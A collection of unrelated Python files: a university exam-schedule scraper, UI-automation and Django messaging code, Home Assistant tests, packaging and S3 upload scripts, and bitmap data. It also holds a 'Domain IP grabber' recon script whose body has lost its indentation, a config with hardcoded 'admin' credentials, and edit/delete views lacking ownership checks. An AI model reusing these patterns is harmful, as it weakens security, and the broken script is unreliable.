    link_utsc = "https://www.utsc.utoronto.ca/registrar/examination-schedule"

    def __init__(self):
        super().__init__(
            file="../nikel-datasets/data/exams.json",
            update=True,
            schema=ExamsSchema
        )

    @staticmethod
    def process_building_code(code):
        """Insert a space between building letters and room digits,
        e.g. "MP102" -> "MP 102"; codes without digits pass through unchanged."""
        for idx, char in enumerate(code):
            if char.isdigit():
                return f"{code[:idx]} {code[idx:]}"
        return code

    def custom_mapping(self, title, fields):
        """Normalize one UTSG table row to
        [course, lecture_code, split, location, date, start, end].

        The column layout varies per exam sitting, so each known sitting gets
        its own mapping; unrecognized sittings are assumed to publish no
        location column.
        """
        fields = [field.text.strip() for field in fields]
        if title == "June 2019":
            # Location spans two cells (building + room).
            return [fields[0], fields[1], fields[2], f"{fields[3]} {fields[4]}", fields[5], fields[6], fields[7]]
        elif title == "August 2019":
            return [fields[0], fields[1], fields[2], self.process_building_code(fields[3]), fields[4], fields[5],
                    fields[6]]
        elif title == "December 2019":
            return [fields[0], fields[1], fields[2], fields[3], fields[4], fields[5], fields[6]]
        else:
            return [fields[0], fields[1], fields[2], None, fields[3], fields[4], fields[5]]

    def process_utsg(self):
        """Scrape the UTSG Arts & Science schedule (one accordion panel per sitting)."""
        # Art Sci at UTSG
        page = requests.get(ExamsParser.link_artsci)
        parsed_page = BeautifulSoup(page.content, "lxml")
        terms = parsed_page.find_all("div", {"class": "panel panel-default"})
        for term in terms:
            title = term.find("a", {"class": "accordion-panel-h4-a"}).text
            if title == "Locations":
                # Auxiliary panel, not an exam sitting.
                continue
            month, year = title.split(" ")
            rows = term.find_all("tr")
            for row in rows[1:]:  # rows[0] is the table header
                fields = self.custom_mapping(title, row.find_all("td"))
                exam_id, course_id, course_code = get_course_info(month, year, fields[0])
                if exam_id in self.data:
                    # Exam already recorded: append this section unless its
                    # "split" (e.g. surname range) is already present.
                    split_exists = False
                    for i in range(len(self.data[exam_id]["sections"])):
                        if fields[2] == self.data[exam_id]["sections"][i]["split"]:
                            split_exists = True
                            break
                    if not split_exists:
                        self.data[exam_id]["sections"].append(
                            {
                                "lecture_code": fields[1],
                                "split": fields[2],
                                "location": fields[3]
                            }
                        )
                else:
                    if fields[4] == "Decemberc 10":
                        # Workaround for a typo on the source page that
                        # dateutil cannot parse; only month/day are used below,
                        # the placeholder year 2000 is discarded.
                        exam_date = datetime(
                            year=2000,
                            month=12,
                            day=10
                        )
                    else:
                        exam_date = parser.parse(fields[4])
                    date = datetime.now()  # timestamp for last_updated
                    # Convert the clock times to seconds since midnight.
                    start_time = parser.parse(fields[5])
                    start_secs = (start_time - start_time.replace(hour=0, minute=0, second=0,
                                                                  microsecond=0)).total_seconds()
                    end_time = parser.parse(fields[6])
                    end_secs = (end_time - end_time.replace(hour=0, minute=0, second=0,
                                                            microsecond=0)).total_seconds()
                    duration = end_secs - start_secs
                    exam = OrderedDict([
                        ("id", exam_id),
                        ("course_id", course_id),
                        ("course_code", course_code),
                        ("campus", "St. George"),
                        ("date", f'{year}-{exam_date.strftime("%m-%d")}'),
                        ("start", int(start_secs)),
                        ("end", int(end_secs)),
                        ("duration", int(duration)),
                        ("sections", [{
                            "lecture_code": fields[1],
                            "split": fields[2],
                            "location": fields[3]
                        }]),
                        ("last_updated", date.isoformat())
                    ])
                    self.add_item(exam)

    def process_utm(self):
        """Scrape the UTM final-exam table."""
        page = requests.get(ExamsParser.link_utm)
        parsed_page = BeautifulSoup(page.content, "lxml")
        # month, year = parsed_page.find("h1").text.split()[:2]
        # HACK: sitting is hard-coded; the commented line above shows the
        # intended extraction from the page heading.
        month, year = ["July", "2020"]
        rows = parsed_page.find_all("tr")
        for row in rows[1:]:  # rows[0] is the table header
            fields = [field.text.strip() for field in row.find_all("td")]
            exam_id, course_id, course_code = get_course_info(month, year, fields[0])
            exam_date = parser.parse(fields[2])
            # Seconds since midnight for start/end.
            start_time = parser.parse(fields[4])
            start_secs = (start_time - start_time.replace(hour=0, minute=0, second=0,
                                                          microsecond=0)).total_seconds()
            end_time = parser.parse(fields[5])
            end_secs = (end_time - end_time.replace(hour=0, minute=0, second=0,
                                                    microsecond=0)).total_seconds()
            duration = end_secs - start_secs
            date = datetime.now()  # timestamp for last_updated
            exam = OrderedDict([
                ("id", exam_id),
                ("course_id", course_id),
                ("course_code", course_code),
                ("campus", "Mississauga"),
                ("date", f'{year}-{exam_date.strftime("%m-%d")}'),
                ("start", int(start_secs)),
                ("end", int(end_secs)),
                ("duration", int(duration)),
                ("sections", []),
                ("last_updated", date.isoformat())
            ])
            self.add_item(exam)

    def process_utsc(self):
        """Scrape the UTSC examination schedule."""
        page = requests.get(ExamsParser.link_utsc)
        parsed_page = BeautifulSoup(page.content, "lxml")
        month, year = parsed_page.find("h2", {"class": "block-title"}).text.split()[:2]
        rows = parsed_page.find_all("tr", {"class": ["odd", "even"]})
        for row in rows:
            fields = [field.text.strip() for field in row.find_all("td")]
            course_code = fields[0].split()[0]
            exam_id, course_id, course_code = get_course_info(month, year, course_code)
            if exam_id is None:
                # NOTE(review): break (not continue) stops at the first row whose
                # sitting cannot be resolved — confirm the table is ordered so
                # that no valid rows follow.
                break
            exam_date = parser.parse(fields[1])
            try:
                start_time = parser.parse(fields[2])
                start_secs = (start_time - start_time.replace(hour=0, minute=0, second=0,
                                                              microsecond=0)).total_seconds()
            except:
                # Unparseable start time (e.g. a take-home exam row): treat as midnight.
                start_time = None
                start_secs = 0
            date = datetime.now()  # timestamp for last_updated
            if fields[3] == "3:00 +1" or fields[3] == "9:00 +1":
                # "+1" marks an end time on the following day; reuse the start
                # time so the zero duration below gets mapped to 24 h.
                end_time = start_time
            else:
                end_time = parser.parse(fields[3])
            end_secs = (end_time - end_time.replace(hour=0, minute=0, second=0,
                                                    microsecond=0)).total_seconds()
            duration = end_secs - start_secs
            if duration == 0:
                duration = 3600 * 24
            exam = OrderedDict([
                ("id", exam_id),
                ("course_id", course_id),
                ("course_code", course_code),
                ("campus", "Scarborough"),
                ("date", f'{year}-{exam_date.strftime("%m-%d")}'),
                ("start", int(start_secs)),
                ("end", int(end_secs)),
                ("duration", int(duration)),
                ("sections", []),
                ("last_updated", date.isoformat())
            ])
            self.add_item(exam)

    @staticmethod
    def process_field(page, id: str):
        """Return the stripped text of the <span> with the given id, or None
        if the page has no such element. (Parameter 'id' shadows the builtin.)"""
        field = page.find("span", id=id)
        if field:
            field = field.text.strip()
        return field
if __name__ == "__main__":
    # Full pipeline: load the existing dataset, refresh all three campuses,
    # write it back out, then validate against the schema.
    p = ExamsParser()
    p.load_file()
    p.process_utsg()
    p.process_utm()
    p.process_utsc()
    p.dump_file()
    p.thread_print(f"Validating {p.file}...")
    p.validate_dump()
|
"""Package entry point: re-export the public API of every submodule."""
from . import utils
from .asset import *
from .category import *
from .channel import *
from .client import *
from .embed import *
from .enums import *
from .errors import *
from .file import *
from .flags import *
from .invite import *
from .member import *
from .message import *
from .messageable import *
from .permissions import *
from .role import *
from .server import *
from .user import *
# Package version as a (major, minor, patch) tuple.
__version__ = (0, 1, 7)
|
from enum import Enum
from typing import Optional, Any
from System import InvalidOperationException # pylint: disable=import-error
from FlaUILibrary.flaui.exception import FlaUiError
from FlaUILibrary.flaui.interface import (ModuleInterface, ValueContainer)
from FlaUILibrary.flaui.util.converter import Converter
class Selector(ModuleInterface):
    """
    List control module wrapper for FlaUI usage.
    Wrapper module executes methods from ComboBox.cs and ListBox.cs implementation.
    https://docs.microsoft.com/de-de/dotnet/api/system.windows.controls.primitives.selector?view=net-5.0
    """

    class Container(ValueContainer):
        """
        Value container from selector module.
        """
        index: Optional[int]
        name: Optional[str]
        element: Optional[Any]

    class Action(Enum):
        """Supported actions for execute action implementation."""
        SELECT_ITEM_BY_INDEX = "SELECT_ITEM_BY_INDEX"
        SELECT_ITEM_BY_NAME = "SELECT_ITEM_BY_NAME"
        SHOULD_CONTAIN = "SHOULD_CONTAIN"
        GET_ITEMS_COUNT = "GET_ITEMS_COUNT"
        GET_ALL_NAMES_FROM_SELECTION = "GET_ALL_NAMES_FROM_SELECTION"
        SHOULD_HAVE_SELECTED_ITEM = "SHOULD_HAVE_SELECTED_ITEM"
        GET_SELECTED_ITEMS = "GET_SELECTED_ITEMS"

    @staticmethod
    def create_value_container(element=None, index=None, name=None, msg=None):
        """
        Helper to create container object.
        Raises:
            FlaUiError: If creation from container object failed by invalid values.
        Args:
            element (Object): ListBox or Combobox elements.
            index (Number): Number to select from element
            name (String): Name from element to select
            msg (String): Optional error message
        """
        # Falsy elements are normalized to None so the container never holds
        # an empty/invalid UI handle.
        return Selector.Container(name=Converter.cast_to_string(name),
                                  element=None if not element else element,
                                  index=Converter.cast_to_int(index, msg))

    def execute_action(self, action: Action, values: Container):
        """If action is not supported an ActionNotSupported error will be raised.
        Supported actions for checkbox usages are:
          *  Action.SELECT_ITEM_BY_INDEX
            * values ["element", "index"]
            * Returns : None
          *  Action.SELECT_ITEM_BY_NAME
            * values ["element", "name"]
            * Returns : None
          *  Action.SHOULD_CONTAIN
            * values ["element", "name"]
            * Returns : None
          *  Action.GET_ITEMS_COUNT
            * values ["element"]
            * Returns : Number of items from the element.
          *  Action.GET_ALL_NAMES_FROM_SELECTION
            * values ["element"]
            * Returns : List of names from all selected items.
          *  Action.SHOULD_HAVE_SELECTED_ITEM
            * values ["element", "name"]
            * Returns : None
          *  Action.GET_SELECTED_ITEMS
            * values ["element"]
            * Returns : String from all selected items.
        Raises:
            FlaUiError: If action is not supported.
        Args:
            action (Action): Action to use.
            values (Object): See action definitions for value usage.
        """
        # Dispatch table keyed by Action; lambdas defer evaluation until the
        # chosen entry is called at the end.
        switcher = {
            self.Action.SELECT_ITEM_BY_INDEX:
                lambda: self._select_by_index(values["element"], values["index"]),
            self.Action.SELECT_ITEM_BY_NAME:
                lambda: self._select_by_name(values["element"], values["name"]),
            self.Action.SHOULD_CONTAIN:
                lambda: self._should_contain(values["element"], values["name"]),
            self.Action.GET_ITEMS_COUNT:
                lambda: values["element"].Items.Length,
            self.Action.GET_ALL_NAMES_FROM_SELECTION:
                lambda: self._get_all_selected_names(values["element"]),
            self.Action.SHOULD_HAVE_SELECTED_ITEM:
                lambda: self._should_have_selected_item(values["element"], values["name"]),
            self.Action.GET_SELECTED_ITEMS:
                lambda: self._get_selected_items(values["element"])
        }
        return switcher.get(action, lambda: FlaUiError.raise_fla_ui_error(FlaUiError.ActionNotSupported))()

    @staticmethod
    def _get_selected_items(element: Any) -> str:
        """
        Try to get all selected items as string.
        Args:
            element (Object): List view to select items.
        Returns:
            String from all selected items, one per line (trailing newline), for example:
            Value 1
            Value 2
        """
        values = ""
        for selected_item in element.SelectedItems:
            values += selected_item.Text + "\n"
        return values

    @staticmethod
    def _select_by_index(element: Any, index: int):
        """
        Try to select element from given index.
        Args:
            element (Object): List control UI object.
            index (Number): Index number to select
        Raises:
            FlaUiError: By an array out of bound exception
            FlaUiError: If value is not a number.
        """
        try:
            element.Items[int(index)].Select()
        except IndexError:
            raise FlaUiError(FlaUiError.ArrayOutOfBoundException.format(index)) from None
        except ValueError:
            raise FlaUiError(FlaUiError.ValueShouldBeANumber.format(index)) from None

    @staticmethod
    def _select_by_name(element: Any, name: str):
        """
        Try to select element from given name.
        Args:
            element (Object): List control UI object.
            name (String): Name from item to select
        Raises:
            FlaUiError: If value can not be found by element.
        """
        try:
            element.Select(name)
        except InvalidOperationException:
            # .NET raises InvalidOperationException for an unknown name.
            raise FlaUiError(FlaUiError.ElementNameNotFound.format(name)) from None

    @staticmethod
    def _should_have_selected_item(control: Any, item: Any):
        """
        Verification if specific items are selected.
        Args:
            control (Object): List control UI object.
            item (String): Item name which should be selected.
        Raises:
            FlaUiError: If the given item is not among the selected items.
        """
        names = Selector._get_all_selected_names(control)
        if item not in names:
            raise FlaUiError(FlaUiError.ItemNotSelected.format(item))

    @staticmethod
    def _get_all_selected_names(control: Any) -> list:
        """
        Get all selected names.
        Args:
            control (Object): List control element from FlaUI.
        Returns:
            List from all names from list control if exists otherwise empty list.
        """
        names = []
        for selected_item in control.SelectedItems:
            names.append(selected_item.Name)
        return names

    @staticmethod
    def _should_contain(control: Any, name: str):
        """
        Checks if Listbox contains an given item by name.
        Args:
            control (Object): List control element from FlaUI.
            name (String): Name from combobox item which should exist.
        Raises:
            FlaUiError: If no item with the given name exists in the control.
        """
        for item in control.Items:
            if item.Name == name:
                return
        raise FlaUiError(FlaUiError.ControlDoesNotContainItem.format(name))
|
import sys,os,re,socket,binascii,time,json,random,threading,Queue,pprint,urlparse,smtplib,telnetlib,os.path,hashlib,string,urllib2,glob,sqlite3,urllib,argparse,marshal,base64,colorama,requests
from colorama import *
from random import choice
from colorama import Fore,Back,init
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from platform import system
from Queue import Queue
from time import strftime
from urlparse import urlparse
from urllib2 import urlopen
colorama.init()
#Credit to Mister Spy
# Now regular ANSI codes should work, even in Windows.
# SGR escape sequences: ESC [ <mode> m.
CLEAR_SCREEN = '\033[2J'
RED = '\033[31m'  # mode 31 = red foreground
RESET = '\033[0m'  # mode 0 = reset all attributes
BLUE = "\033[34m"
CYAN = "\033[36m"
GREEN = "\033[32m"
BOLD = "\033[1m"     # FIX: was "\033[m" (equivalent to reset); mode 1 = bold
REVERSE = "\033[7m"  # FIX: was "\033[m" (equivalent to reset); mode 7 = reverse video
def logo():
    """Print the ASCII-art banner, each line in a randomly chosen ANSI color."""
    clear = "\x1b[0m"  # reset sequence appended after every line
    colors = [36, 32, 34, 35, 31, 37 ]  # cyan, green, blue, magenta, red, white
    x = """
 ____                        _       ___                       _     _
|  _ \  ___  _ __ ___   __ _(_)_ __ |_ _|_ __   __ _ _ __ __ _| |__ | |__   ___ _ __
| | | |/ _ \| '_ ` _ \ / _` | | '_ \ | || '_ \ / _` | '__/ _` | '_ \| '_ \ / _ \ '__|
| |_| | (_) | | | | | | (_| | | | | || || |_) | (_| | | | (_| | |_) | |_) |  __/ |
|____/ \___/|_| |_| |_|\__,_|_|_| |_|___| .__/ \__, |_|  \__,_|_.__/|_.__/ \___|_|
                                        |_|    |___/
Note : Domaine List Shoud Be Without http://
"""
    # N is unused; enumerate only drives the per-line iteration here.
    for N, line in enumerate(x.split("\n")):
        sys.stdout.write("\x1b[1;%dm%s%s\n" % (random.choice(colors), line, clear))
        time.sleep(0.05)  # slow reveal effect
logo()
def getIP(site):
site = i.strip()
try:
if 'http://' not in site:
IP1 = socket.gethostbyname(site)
print "IP: "+IP1
open('ips.txt', 'a').write(IP1+'\n')
elif 'http://' in site:
url = site.replace('http://', '').replace('https://', '').replace('/', '')
IP2 = socket.gethostbyname(url)
print "IP: "+IP2
open('IP_grabber_from_domain/ips.txt', 'a').write(IP2+'\n')
except:
pass
# Prompt for the domain-list filename and resolve every line in it.
nam=raw_input('Domain List name :')
with open(nam) as f:
    for i in f:
        getIP(i)
|
"""Flask application configuration: logging, session cookie, U2F and database settings."""
import os, logging

# ----- LOGGING ----- #
DEBUG = True
LOG_FILE = 'logfile.log'
# 1 DEBUG - detailed info
# 2 INFO - confirmation that things according to plan
# 3 WARNING - something unexpected
# 4 ERROR - some function failed
# 5 CRITICAL - application failure
LOG_LEVEL = logging.DEBUG
logging.basicConfig(filename = LOG_FILE,
                    level = LOG_LEVEL)
# Adds console print
logging.getLogger().addHandler(logging.StreamHandler())
# ----- LOGGING ENDS ----- #
# ----- COOKIE ----- #
# The session signing key lives in a separate file so it stays out of
# version control; this raises if the key file is missing.
COOKEY_FILE = 'COOKEY.key'
with open(COOKEY_FILE) as r:
    SECRET_KEY = r.read() #Reads key from file
# ----- COOKIE ENDS ----- #
# ----- U2F ----- #
U2F_APPID = 'https://localhost:5000'
# Set to True to enable facets
U2F_FACETS_ENABLED = False
U2F_FACETS_LIST = [
    'https://localhost:5000'
]
# ----- U2F ENDS ----- #
# ----- DATABASES ----- #
DATABASE = 'flaskr.db'
# NOTE(review): hardcoded development credentials -- do not ship to production.
USERNAME = 'admin'
PASSWORD = 'admin'
# defines the full path for the database
BASEDIR = os.path.abspath(os.path.dirname(__file__))
DATABASE_PATH = os.path.join(BASEDIR, DATABASE)
# the database uri
SQLALCHEMY_DATABASE_URI = 'sqlite:///' + DATABASE_PATH
SQLALCHEMY_TRACK_MODIFICATIONS = False
# ----- DATABASES ENDS ----- #
|
from django.contrib.auth.models import User
from django.shortcuts import render
from .models import Message
from .forms import MessageForm
from django.http import HttpResponseRedirect
from django.core.urlresolvers import reverse_lazy
from django.views.generic.edit import UpdateView, DeleteView
from django.utils import timezone
from django.contrib.auth.decorators import login_required
from django.contrib.auth.mixins import LoginRequiredMixin
@login_required
def index(request):
    """
    Display the main page of the messaging system.

    :param request: Self explanatory; request.user is the inbox owner.
    :return: render containing the html page and all the messages for the user,
             newest first.
    """
    # order_by('-date') sorts newest-first in one idiomatic call (equivalent
    # to the former order_by('date').reverse()).
    messages = Message.objects.filter(recipient=request.user).order_by('-date')
    return render(request, "messages_main.html", {'messages': messages})
@login_required
def createMessage(request):
    """
    Creates a message that can be sent to other users.

    :param request: Self explanatory
    :return: redirect to the inbox on success, otherwise the creation form
             (with validation errors on an invalid POST)
    """
    if request.method == 'POST':
        message_form = MessageForm(request.POST)
        if message_form.is_valid():
            message = message_form.save(commit=False)
            message.date = timezone.now()
            message.sender = request.user
            # Save the instance we just stamped directly (clearer than
            # calling form.save() a second time).
            message.save()
            return HttpResponseRedirect(reverse_lazy('messages_home'))
    else:
        message_form = MessageForm()
    # FIX: restrict the recipient choices on EVERY render. Previously this was
    # only applied in the GET branch, so re-rendering after an invalid POST
    # offered the sender themselves as a recipient.
    message_form.fields['recipient'].queryset = User.objects.all().exclude(pk=request.user.id)
    return render(request, 'messages_create.html', {'message_form': message_form})
class UpdateMessage(LoginRequiredMixin, UpdateView):
    """
    Allows for messages to be edited.

    NOTE(review): any logged-in user can edit any message by pk -- confirm
    ownership checks are enforced elsewhere (e.g. in get_queryset of a caller
    or at the URL level).
    """
    model = Message
    template_name = 'messages_edit.html'
    form_class = MessageForm
    success_url = reverse_lazy('messages_home')  # back to the inbox after saving
class DeleteMessage(LoginRequiredMixin, DeleteView):
    """
    Allows for messages to be deleted.

    NOTE(review): any logged-in user can delete any message by pk -- confirm
    ownership checks are enforced elsewhere.
    """
    model = Message
    template_name = 'messages_delete.html'
    success_url = reverse_lazy('messages_home')  # back to the inbox after deletion
|
"""Define tests for the GeoNet NZ Quakes config flow."""
from datetime import timedelta
from asynctest import CoroutineMock, patch
import pytest
from homeassistant import data_entry_flow
from homeassistant.components.geonetnz_quakes import (
CONF_MINIMUM_MAGNITUDE,
CONF_MMI,
DOMAIN,
FEED,
async_setup_entry,
async_unload_entry,
config_flow,
)
from homeassistant.const import (
CONF_LATITUDE,
CONF_LONGITUDE,
CONF_RADIUS,
CONF_SCAN_INTERVAL,
CONF_UNIT_SYSTEM,
)
from tests.common import MockConfigEntry
@pytest.fixture
def config_entry():
    """Create a mock GeoNet NZ Quakes config entry.

    Mirrors the data of a completed user flow (metric units, default 300 s
    scan interval) so tests can set up/unload the integration directly.
    """
    return MockConfigEntry(
        domain=DOMAIN,
        data={
            CONF_LATITUDE: -41.2,
            CONF_LONGITUDE: 174.7,
            CONF_RADIUS: 25,
            CONF_UNIT_SYSTEM: "metric",
            CONF_SCAN_INTERVAL: 300.0,
            CONF_MMI: 4,
            CONF_MINIMUM_MAGNITUDE: 0.0,
        },
        title="-41.2, 174.7",
    )
async def test_duplicate_error(hass, config_entry):
    """Test that errors are shown when duplicates are added."""
    user_input = {CONF_LATITUDE: -41.2, CONF_LONGITUDE: 174.7, CONF_RADIUS: 25}
    # Register an identical entry first so the flow detects the duplicate.
    config_entry.add_to_hass(hass)
    handler = config_flow.GeonetnzQuakesFlowHandler()
    handler.hass = hass
    outcome = await handler.async_step_user(user_input=user_input)
    assert outcome["errors"] == {"base": "identifier_exists"}
async def test_show_form(hass):
    """Test that the form is served with no input."""
    handler = config_flow.GeonetnzQuakesFlowHandler()
    handler.hass = hass
    # No user input yet -> the flow must present the "user" form.
    outcome = await handler.async_step_user(user_input=None)
    assert outcome["type"] == data_entry_flow.RESULT_TYPE_FORM
    assert outcome["step_id"] == "user"
async def test_step_import(hass):
    """Test that the import step works."""
    conf = {
        CONF_LATITUDE: -41.2,
        CONF_LONGITUDE: 174.7,
        CONF_RADIUS: 25,
        CONF_UNIT_SYSTEM: "metric",
        CONF_MMI: 2,
        CONF_SCAN_INTERVAL: timedelta(minutes=4),
        CONF_MINIMUM_MAGNITUDE: 2.5,
    }
    flow = config_flow.GeonetnzQuakesFlowHandler()
    flow.hass = hass
    result = await flow.async_step_import(import_config=conf)
    assert result["type"] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
    assert result["title"] == "-41.2, 174.7"
    # The timedelta scan interval must be normalized to seconds (240.0).
    assert result["data"] == {
        CONF_LATITUDE: -41.2,
        CONF_LONGITUDE: 174.7,
        CONF_RADIUS: 25,
        CONF_MMI: 2,
        CONF_UNIT_SYSTEM: "metric",
        CONF_SCAN_INTERVAL: 240.0,
        CONF_MINIMUM_MAGNITUDE: 2.5,
    }
async def test_step_user(hass):
    """Test that the user step works."""
    # Location defaults come from the hass configuration.
    hass.config.latitude = -41.2
    hass.config.longitude = 174.7
    handler = config_flow.GeonetnzQuakesFlowHandler()
    handler.hass = hass
    outcome = await handler.async_step_user(user_input={CONF_RADIUS: 25, CONF_MMI: 4})
    assert outcome["type"] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
    assert outcome["title"] == "-41.2, 174.7"
    # Omitted options must be filled with their defaults.
    expected = {
        CONF_LATITUDE: -41.2,
        CONF_LONGITUDE: 174.7,
        CONF_RADIUS: 25,
        CONF_MMI: 4,
        CONF_UNIT_SYSTEM: "metric",
        CONF_SCAN_INTERVAL: 300.0,
        CONF_MINIMUM_MAGNITUDE: 0.0,
    }
    assert outcome["data"] == expected
async def test_component_unload_config_entry(hass, config_entry):
    """Test that loading and unloading of a config entry works."""
    config_entry.add_to_hass(hass)
    # Patch the feed manager so no real network requests are made.
    with patch(
        "aio_geojson_geonetnz_quakes.GeonetnzQuakesFeedManager.update",
        new_callable=CoroutineMock,
    ) as mock_feed_manager_update:
        # Load config entry.
        assert await async_setup_entry(hass, config_entry)
        await hass.async_block_till_done()
        assert mock_feed_manager_update.call_count == 1
        assert hass.data[DOMAIN][FEED][config_entry.entry_id] is not None
        # Unload config entry.
        assert await async_unload_entry(hass, config_entry)
        await hass.async_block_till_done()
        assert hass.data[DOMAIN][FEED].get(config_entry.entry_id) is None
|
def foo(a, b): a<caret>.
|
# Explicit import instead of the former wildcard (`from setuptools import *`).
from setuptools import setup

# PyPI long description (rendered on the project page).
desc = """
Overview
=====
 [![Join the chat at https://gitter.im/Max00355/Coffer](https://badges.gitter.im/Join%20Chat.svg)](https://gitter.im/Max00355/Coffer?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge) [![#coffer on freenode](https://img.shields.io/badge/style-%23coffer-brightgreen.svg?style=flat&label=freenode)](https://webchat.freenode.net/) [![@cofferproject on Twitter](https://img.shields.io/badge/twitter-%40cofferproject-blue.svg?style=flat)](http://twitter.com/cofferproject)
A lightweight platform for creating isolated and portable development environments.
Requirements
============
- Python 3
- Linux or MacOS
Quick Start
===========
`pip install coffer-container`
What is Coffer?
===============
Before I talk about what Coffer is, let me say what Coffer is *not*. Coffer is not a replacement for Docker. In fact, if you are looking for a completely isolated container
you're probably better off using Docker, or some other container software. Coffer is also not intended to be used as a secure means by which to isolate an application, and
it is recommended that Coffer not be used outside of a development setting.
Coffer is a platform for creating isolated filesystem containers. It is intended to be used to create isolated development environments without having to worry about doing any network configuration.
Applications that are run in Coffer can be accessed outside of a Coffer environment through `localhost` without having to do anything more than `coffer create <name>`.
This makes it easy to get environments up and running for those of us who do not need network isolation, and only wish to isolate an app and its dependencies.
Coffer makes it easy to create, enter, and share environments with others.
What are some features of Coffer?
=================================
- Create isolated file system containers
- Use Coffer templates to automatically install and configure a container
- Share containers and templates with a team to replicate an environment
- Does not isolate network, so there is no extra configuring that needs to be done
- Creating an environment is as easy as executing `coffer create <name of environment>`
How can I get started?
======================
1. Clone this repo
2. Run `setup.py`
3. In a terminal execute `coffer create first_env`
4. Then `coffer enter first_env`
Then like that you have created your first environment! For more extensive getting started docs, read our [Getting Started](https://github.com/Max00355/Coffer/blob/master/docs/GettingStarted.md) docs.
Current Status
==============
Coffer is under very heavy development, and receiving frequent updates. The code in the `master` branch is considered the most stable, and in its current state Coffer is ready for actual use.
In fact, Coffer development is happening in a Coffer container as of right now. If there are any bugs, please create issues about them.
"""
# Packaging metadata passed straight to setuptools.setup().
kwargs = {
    "author" : "Frankie Primerano",
    "author_email" : "frankieprimerano@gmail.com",
    "description" : "A lightweight platform for creating isolated and portable development environments",
    "entry_points" : {"console_scripts" : ["coffer=coffer.coffer:checkArgs"]},
    "name" : "coffer-container",
    "packages" : ["coffer", "coffer.utils"],
    "version" : "1.3.2",
    "url":"https://github.com/Max00355/Coffer",
    "keywords":"container coffer docker vm virtualenv",
    "license":"MIT",
    "long_description":desc,
}
setup(**kwargs)
|
import os
import boto3

# Upload every image recorded by the driving simulator to S3 so the training
# workflow can pull the whole dataset from one bucket.
s3_client = boto3.client('s3')
s3_bucket = "aiworkflow"
training_dataset = "sim_data"

image_dir = os.path.join(training_dataset, "IMG")
for file in os.listdir(image_dir):
    file_name = os.path.join(image_dir, file)
    # Robustness: os.listdir also returns subdirectories; upload_file would
    # fail on those, so only regular files are uploaded.
    if not os.path.isfile(file_name):
        continue
    # Object keys are flattened: "<dataset>_<image filename>".
    object_name = training_dataset + "_" + file
    print(object_name)
    s3_client.upload_file(file_name, s3_bucket, object_name)
|
##
# @filename : imagedata.py
# @brief : data file for epd demo
#
# Copyright (C) Waveshare August 16 2017
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
MONOCOLOR_BITMAP = [ # 0X00,0X01,0X80,0X02,0X80,0X01, #
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
